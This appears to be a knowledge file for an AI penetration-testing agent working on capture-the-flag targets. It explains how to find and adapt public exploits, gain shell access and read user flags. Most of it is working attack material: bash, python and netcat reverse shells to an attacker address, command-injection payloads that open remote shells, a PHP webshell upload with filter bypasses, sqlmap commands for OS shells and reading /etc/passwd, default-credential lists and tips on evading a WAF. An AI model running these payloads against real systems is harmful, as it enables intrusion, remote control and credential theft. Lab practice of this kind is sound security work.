--- name: exploitation-knowledge description: Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities. --- # Exploitation Knowledge Base ## Purpose This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag. ## Core Topics Covered 1. **Exploit Discovery**: Finding relevant exploits for discovered services 2. **Exploit Adaptation**: Modifying exploits to work in the target environment 3. **Initial Access**: Gaining command execution or shell access 4. **Shell Stabilization**: Upgrading to stable, usable shells 5. **User Flag Capture**: Locating and reading user.txt ## Tools Available ### Exploit Databases - `searchsploit` - Local exploit-db search - `msfconsole` - Metasploit framework - Manual search: ExploitDB, GitHub, security advisories ### Shell Tools - Reverse shells: bash, python, php, nc - Web shells: PHP, ASP, JSP - `rlwrap nc` - Stabilize shells ### Web Exploitation - `sqlmap` - SQL injection - `curl` - Manual web testing - File upload bypass techniques - Command injection testing ### Credential Testing - `hydra` - Service brute force (limited use) - `ssh`/`ftp`/`mysql` - Test discovered credentials ## Exploitation Workflow ### Phase 1: Multi-Source Exploit Discovery **Core Principle:** Use multiple exploit sources in parallel - never rely on a single source. **Layered Exploit Search:** ```bash # Layer 1: Local database (fastest) searchsploit "service version" searchsploit CVE-YYYY-XXXXX # If found → proceed to analysis # If not found → immediately try Layer 2 # Layer 2: Metasploit framework msfconsole -q -x "search type:exploit name:service_name; exit" # If found → test with msfconsole # If not found → immediately try Layer 3 # Layer 3: Online sources (GitHub, Google) # GitHub API search (automated) curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url' # Google search (manual if needed) # Search: "CVE-YYYY-XXXXX exploit poc github" # Search: "service_name version exploit" # Layer 4: Adapt or create custom exploit # Based on vulnerability description/advisory # Modify existing PoC for your environment ``` **Critical Rules:** 1. **Try all layers** - Don't stop at Layer 1 failure 2. **Parallel search** - If time allows, search multiple sources simultaneously 3. **Cross-validate** - If multiple exploits exist, try most reliable/recent first 4. **Track sources** - Record which source worked in `successful_paths` ### Phase 2: Exploit Analysis Before running: 1. **Read the exploit code** - understand what it does 2. **Check requirements** - needed libraries, credentials 3. **Identify target parameters** - IP, port, payload location 4. **Plan adaptation** - what needs to be modified ### Phase 3: Exploit Adaptation Common modifications needed: #### A. Python Exploits ```python # Original (interactive) import sys target = sys.argv[1] shell = raw_input("Enter command: ") # Adapted (non-interactive) target = "10.10.10.1" shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" ``` #### B. Metasploit Exploits ```bash # Use non-interactive mode msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit" ``` #### C. Reverse Shell Payloads ```bash # Bash reverse shell bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' # Python reverse shell python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])' # PHP reverse shell (for uploads) & /dev/tcp/YOUR_IP/4444 0>&1'"); ?> # NC reverse shell nc YOUR_IP 4444 -e /bin/bash # Or if -e not available: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f ``` ### Phase 4: Listener Setup Always start listener before triggering exploit: ```bash # Simple listener nc -lvnp 4444 # Stabilized listener with rlwrap rlwrap nc -lvnp 4444 ``` ### Phase 5: Execution Execute exploit and verify success: ```bash # Run exploit python3 exploit.py # If successful, you should see connection in listener # Test with: id whoami pwd ``` ### Phase 6: Shell Stabilization Once you have basic shell: ```bash # Upgrade to TTY shell python3 -c 'import pty;pty.spawn("/bin/bash")' # Then press Ctrl+Z stty raw -echo; fg export TERM=xterm ``` ## Common Attack Vectors ### 1. File Upload Vulnerabilities ```bash # Test simple upload curl -F "file=@shell.php" http://TARGET/upload.php # Bypass restrictions # Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP # Find uploaded file gobuster dir -u http://TARGET/uploads -x php,phtml # Trigger shell curl http://TARGET/uploads/shell.php?cmd=id ``` ### 2. SQL Injection ```bash # Test for SQLi sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3 # If found, try to get shell sqlmap -u "http://TARGET/page.php?id=1" --os-shell # Or read files sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd ``` ### 3. Command Injection ```bash # Test common injection points curl "http://TARGET/ping.php?ip=127.0.0.1;id" curl "http://TARGET/ping.php?ip=127.0.0.1|whoami" curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`" # Get reverse shell curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" ``` ### 4. Public Exploits ```bash # If you find CVE-2021-XXXX is applicable # Search for PoC searchsploit CVE-2021-XXXX # Or check GitHub curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url' # Download and adapt wget https://raw.githubusercontent.com/user/repo/exploit.py # Modify target IP, ports, payload # Run python3 exploit.py ``` ### 5. Default Credentials Test these FIRST before complex exploits: ```bash # SSH ssh admin@TARGET # Try: admin/admin, root/root, root/toor # FTP ftp TARGET # Try: anonymous/anonymous, admin/admin # MySQL mysql -h TARGET -u root -p # Try: root/'', root/root # Web Admin Panels # Try: admin/admin, admin/password, admin/admin123 ``` ## Environment Detection and Payload Adaptation **Core Principle:** Always probe environment before choosing exploitation method. ### Pre-Exploitation Environment Check **Check your attacking machine:** ```bash # Check critical tools and versions java -version 2>&1 | head -1 # For JNDI, deserialization exploits python3 --version # For exploit scripts gcc --version # For compiling exploits which nc netcat ncat # For reverse shells # Record environment limitations # Example: If Java > 8, JNDI injection will be blocked # Example: If no gcc, can't compile C exploits → need precompiled or script-based ``` **Check target environment (after gaining RCE):** ```bash # Via webshell or command injection, test what's available: which nc python python3 php perl bash sh curl wget # Test specific versions if exploit requires them python --version php --version # Check writable directories ls -la /tmp /dev/shm /var/tmp # Check for filtering/WAF # Try: echo test # Try: cat /etc/passwd # If blocked, try base64 encoding or other bypass ``` ### Adaptive Payload Selection **Decision Tree for Reverse Shells:** ``` 1. Do we have RCE? └─ Yes → Proceed to step 2 └─ No → Get RCE first (file upload, SQLi, etc.) 2. Check target environment └─ nc available? → Use nc reverse shell └─ python available? → Use python reverse shell └─ php available? (web server) → Use PHP reverse shell └─ bash available? → Use bash /dev/tcp method └─ None? → Upload binary or use alternative method 3. Test for filtering └─ Try basic command: echo test └─ If special chars blocked (/, &, >, |) → Use encoding: - Base64: echo BASE64 | base64 -d | bash - Hex encoding - URL encoding └─ If commands filtered by keyword → Try alternatives: - cat → head, tail, nl, more, less - nc → /dev/tcp, telnet, socat ``` **Example Adaptive Flow:** ```bash # Step 1: Gained RCE via file upload, test environment curl "http://TARGET/shell.php?cmd=which nc" # Response: empty (nc not available) # Step 2: Try python curl "http://TARGET/shell.php?cmd=which python3" # Response: /usr/bin/python3 (available!) # Step 3: Use python reverse shell curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'" # If that fails with error, diagnose: # - Syntax error? → Check for character filtering # - No response? → May be WAF blocking # → Try base64 encoded version ``` ### Failure Diagnosis for Exploits **When exploit fails, systematically diagnose:** ```bash # Type 1: No response at all Possible causes: - Firewall blocking - Wrong target IP/port - Service actually not vulnerable Action: Verify target is reachable, try different port, re-check vulnerability # Type 2: Error message returned Possible causes: - Missing dependency (library, tool) - Wrong syntax for target environment - Version mismatch Action: Read error carefully, install missing deps, adapt exploit code # Type 3: Exploit runs but no shell Possible causes: - Payload blocked by filtering - Target missing required tool (nc, python) - Firewall blocking outbound connections Action: Try different payload encoding, use different shell method, test with simple command first # Type 4: Tool-specific failure (e.g., Metasploit fails) Possible causes: - Bug in Metasploit module - Configuration issue Action: Try alternative exploit source (GitHub, manual PoC), check module options ``` **Record diagnosis in state:** ```bash jq '.failed_attempts += [{ "exploit": "CVE-2021-12345", "tool": "metasploit", "failure_type": "no shell received", "diagnosis": "target missing nc, switched to python payload", "resolution": "used GitHub PoC with python reverse shell - success" }]' .pentest-state.json ``` ## Handling Non-Interactive Shells Since you're in CLI-only environment: ### Execute Commands Without TTY ```bash # Instead of interactive shell, use command execution curl http://TARGET/shell.php?cmd=cat+/etc/passwd # Chain commands curl http://TARGET/shell.php?cmd=cd+/home;ls+-la # Use semicolons curl http://TARGET/shell.php?cmd=id;whoami;pwd ``` ### Background Reverse Shells ```bash # Start listener in background nc -lvnp 4444 > shell-output.txt 2>&1 & # Trigger exploit python3 exploit.py # Check output cat shell-output.txt # Send commands via named pipe mkfifo /tmp/pipe nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 & ``` ## User Flag Capture Once you have command execution: ### 1. Locate User Flag ```bash # Search for user.txt find / -name "user.txt" 2>/dev/null find /home -name "user.txt" 2>/dev/null find /home -name "*.txt" 2>/dev/null # Common locations cat /home/*/user.txt cat /home/user/user.txt ``` ### 2. Read and Verify ```bash # Read flag cat /home/username/user.txt # Verify format (should be 32-char hex) cat /home/username/user.txt | wc -c # Should be 33 (32 + newline) ``` ### 3. Update State ```bash # Save to state file USER_FLAG=$(cat /home/username/user.txt) jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json ``` ## Troubleshooting Failed Exploits ### Common Issues 1. **"Connection refused"** - Check listener is running: `netstat -tlnp | grep 4444` - Verify firewall allows connections - Try different port 2. **"Module not found" (Python)** - Install: `pip3 install requests pycrypto` - Or adapt code to remove dependency 3. **"Permission denied"** - Exploit may need root privileges - Try different vulnerability 4. **"Exploit works but no shell"** - Check payload syntax - Try different reverse shell method - Verify target has bash/python/nc 5. **"Timeout" or "No response"** - Target may have WAF/IDS - Try encoding payload - Use slower, stealthier approach ## Decision Tree ``` Found Vulnerability │ ├─ Is there a public exploit? │ ├─ Yes → Search searchsploit/GitHub │ │ → Adapt and run │ └─ No → Can you write custom exploit? │ → Develop PoC │ ├─ Initial Access Gained? │ ├─ Yes → Capture user flag │ │ → Proceed to privilege escalation │ └─ No → Try alternative vector │ → Review reconnaissance data │ → Attempt different service │ └─ Stuck after 3 attempts? → Re-run reconnaissance → Look for overlooked services → Check for misconfigurations ``` ## Output Format After successful exploitation: ```json { "status": "user_access_gained", "method": "File upload RCE via /uploads", "access_level": "www-data", "shell_type": "non-interactive webshell", "user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6", "credentials_found": [], "next_steps": "Privilege escalation required for root flag" } ``` ## Success Criteria Success criteria: 1. ✅ Command execution achieved on target 2. ✅ User flag located and read 3. ✅ Flag is 32-character hexadecimal string 4. ✅ Access documented in state file 5. ✅ Ready to proceed to privilege escalation phase ## Key Principles 1. **Adapt exploits** - public exploits rarely work as-is 2. **Handle non-interactive** - CLI-only environment requires creativity 3. **Verify success** - always test access with `id`, `whoami` 4. **Capture flag** - don't proceed without user.txt content 5. **Document method** - save successful path for future reference ## Remember - Try simple before complex (default creds before 0-days) - Read exploit code before running (understand what it does) - Non-interactive shells require different commands - User flag MUST be captured before moving to privesc - If stuck, revisit reconnaissance for missed vectors